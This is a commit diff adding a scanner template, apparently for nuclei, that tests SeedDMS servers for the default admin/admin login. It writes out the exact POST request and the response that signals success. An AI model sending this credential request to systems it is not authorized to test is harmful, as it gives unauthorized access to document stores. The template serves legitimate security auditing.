Merge pull request #3041 from alifathi-h1/master

SeedDMS Default Login

default-logins/seeddms/seeddms-default-login.yaml

@@ -0,0 +1,35 @@
+id: seeddms-default-login
+
+info:
+  name: SeedDMS Default Credential
+  author: alifathi-h1
+  severity: high
+  reference: https://www.redhat.com/sysadmin/install-seeddms
+  tags: default-login,seeddms
+
+requests:
+  - raw:
+      - |
+        POST /op/op.Login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        login={{username}}&pwd={{password}}&lang=
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    attack: pitchfork
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Location: /out/out.ViewFolder.php'
+
+      - type: status
+        status:
+          - 302